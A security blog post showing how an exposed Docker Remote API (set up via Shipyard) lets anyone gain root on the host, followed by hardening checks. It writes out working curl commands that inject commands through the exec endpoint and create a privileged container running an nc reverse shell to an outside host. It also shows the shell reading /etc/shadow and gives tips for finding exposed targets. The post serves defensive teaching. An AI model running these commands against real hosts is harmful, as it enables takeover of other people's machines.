Owning a system through an exposed Docker interface


About a year ago I wanted to understand what all the hype surrounding Docker was about. I started playing with containers, resource management and automated deployment. Eventually I felt that a management tool (ideally web-based) would come in handy, especially for testing new containers and demoing some of Docker’s cool features to my colleagues. I found the Shipyard project, which seemed to be exactly what I was looking for. It includes an automated deployment script that sets up an entire Docker cluster with a single “curl | bash” command. That’s beside the point here, but the practice is usually a sign of poor security awareness; see this article for more details on how it can be exploited even when the user tries to validate the script being served.

We’re going to replicate these steps on a fresh Ubuntu 16.04 VM. First we’ll make sure the docker-engine package is installed from the official Docker repository.
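
If you’re following along, that step boils down to something like the following (a rough sketch which assumes Docker’s apt repository has already been added as per the official instructions of the time; the package and repository names have changed since):

# assumes Docker's apt repository is already configured
$ sudo apt-get update && sudo apt-get install -y docker-engine
$ docker version

With Docker in place, we run Shipyard’s automatic deployment: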

pat@pat-virtual-machine:~$ sudo curl -sSL https://shipyard-project.com/deploy | sudo bash -s
Unable to find image 'alpine:latest' locally
latest: Pulling from library/alpine
3690ec4760f9: Pulling fs layer
3690ec4760f9: Verifying Checksum
3690ec4760f9: Download complete
3690ec4760f9: Pull complete
...
Status: Downloaded newer image for shipyard/shipyard:latest
Waiting for Shipyard on opendocker.host:8080
.......
Shipyard available at http://opendocker.host:8080
Username: admin Password: shipyard
pat@pat-virtual-machine:~$ 

Simple as that. We’ve got Shipyard running and ready to use; the obvious next step is to change the default credentials to something more secure, and then we can begin experimenting with containers. The documentation doesn’t mention any important post-deployment steps apart from a recommendation to use TLS on the exposed Docker engine port 2375/tcp. For many people, however, “use TLS” doesn’t necessarily imply TLS client-side certificates, which means the Docker Remote API may well be left on an external network interface, accessible to anyone.

Shipyard exposes the API through a lightweight container that simply forwards requests from an open TCP port to the default Docker UNIX socket mounted at /var/run/docker.sock. Having the Docker socket exposed to an untrusted environment is effectively the same as handing out root access to the machine, as we’re going to see shortly. The official Docker documentation warns against this, yet Docker itself makes the misconfiguration very easy to introduce. Several other projects, and probably many more publicly available containers, also require direct access to the Docker API socket, and a security breach in such a container gives easy access to the host system. The bottom line is that you should never expose the Docker socket, not even to a container.
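
To make that concrete: the proxy container Shipyard deploys is conceptually equivalent to something like this (a socat-based illustration, not Shipyard’s actual image or command line):

# forward an open TCP port straight to the mounted Docker socket
$ docker run -d --name docker-proxy -p 2375:2375 \
    -v /var/run/docker.sock:/var/run/docker.sock \
    alpine/socat TCP-LISTEN:2375,reuseaddr,fork UNIX-CONNECT:/var/run/docker.sock

Once something like this is running, anyone who can reach the port is talking straight to the Docker Remote API; for example a plain unauthenticated GET such as

$ curl -s http://opendocker.host:2375/containers/json

returns the full list of running containers.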

Being somewhat curious, I left our Docker sandbox machine running. So far this misconfiguration has been successfully exploited twice, and both times the server ended up being used to launch DDoS attacks. Initial exploitation is fairly easy: all you need to do is call the /containers/(id or name)/exec endpoint and inject an arbitrary command (Exec), i.e.:

$ curl -X POST -H "Content-Type: application/json" http://opendocker.host:2375/containers/f39b4b1ba13f/exec -d '{"Cmd": ["/bin/sh", "-c", "echo h4ck3d > /lol.txt; sleep 20"]}'
{ "Id": "f90e34656806", "Warnings":[] }
$ curl -X POST -H "Content-Type: application/json" http://opendocker.host:2375/exec/f90e34656806/start -d '{}'
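
Whether the injected command actually ran can be confirmed over the same unauthenticated API, for example by pulling the freshly written file back out through the container archive endpoint (a small verification sketch):

$ curl -s -o lol.tar "http://opendocker.host:2375/containers/f39b4b1ba13f/archive?path=/lol.txt"
$ tar -xOf lol.tar
h4ck3d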

During the second exploitation, however, malware was planted on the host machine itself. It turns out that breaking out to the host can also be accomplished easily through Docker’s Remote API: all you need to do is create a new container with the host’s root filesystem mounted, and then you’re free to make any system-wide modifications on the host:

$ curl -X POST -H "Content-Type: application/json" http://opendocker.host:2375/containers/create?name=backd00r -d '{"Image":"alpine", "Cmd":["/usr/bin/nc", "my.ip", "1234", "-e", "/bin/sh"], "Binds": [ "/:/mnt" ], "Privileged": true}'
{"Id":"6a1be4a3e9d3551f10ac9bfbea66022dfce42b033553891751c31e76e43b9d5c","Warnings":null}
$ curl -X POST -H "Content-Type: application/json" http://opendocker.host:2375/containers/backd00r/start?name=backd00r

Reverse shell on my.ip:

patrikas@my.ip:~$ nc -vlp 1234
listening on [any] 1234 ...
opendocker.host: inverse host lookup failed: Unknown host
connect to [my.ip] from (UNKNOWN) [opendocker.host] 35733
id 
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
head /mnt/etc/shadow
root:!:17133:0:99999:7:::
...
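
Because the container was created with the host’s root filesystem bound at /mnt and the Privileged flag set, this shell already has root-level reach into the host. One illustrative next step (a sketch, not necessarily what the actual attacker did) is to pivot straight into the host’s filesystem:

chroot /mnt /bin/sh

From that point every path refers to the host, so planting persistence (cron entries, SSH keys, replaced binaries) is simply a matter of writing files, which is consistent with the malware planted during the second incident.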

Now this can easily be turned into profit. Both exploitation attempts appeared to be triggered by bots, presumably scanning the internet for open 2375/tcp ports. Relevant targets can also be found by crawling GitHub or even search engines, looking for keywords/patterns such as “/var/run/docker.sock:/var/run/docker.sock”.
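
To see whether one of your own hosts answers the same probes those bots are sending, a quick external check looks something like this (the hostname is a placeholder):

$ nmap -p 2375,2376 your.docker.host
$ curl -m 5 http://your.docker.host:2375/version

If the second command returns a JSON version blob, the Remote API is wide open.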

If you want to secure yourself, first of all make sure that dockerd itself is listening on a local UNIX socket and nothing else, unless you know what you’re doing. If you do need to bind Docker to a TCP socket, then authentication (TLS with client certificates) must be used. You should also review the containers you have deployed and make sure the Docker socket is not exposed to any of them (you can use docker inspect for that); otherwise treat such a container as privileged, with superuser access to the system.
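
A few quick local checks on the Docker host itself, sketched for a stock Ubuntu install (adjust paths and options to your setup):

# is dockerd listening on a TCP port at all?
$ sudo ss -lntp | grep -E ':2375|:2376'

# which -H/hosts options is the daemon actually running with?
$ ps aux | grep [d]ockerd
$ cat /etc/docker/daemon.json 2>/dev/null

# which running containers have the Docker socket mounted?
$ docker ps -q | xargs -r docker inspect --format '{{.Name}}: {{range .Mounts}}{{.Source}} {{end}}' | grep -F /var/run/docker.sock

Anything the last command prints should be treated as having root-equivalent access to the host.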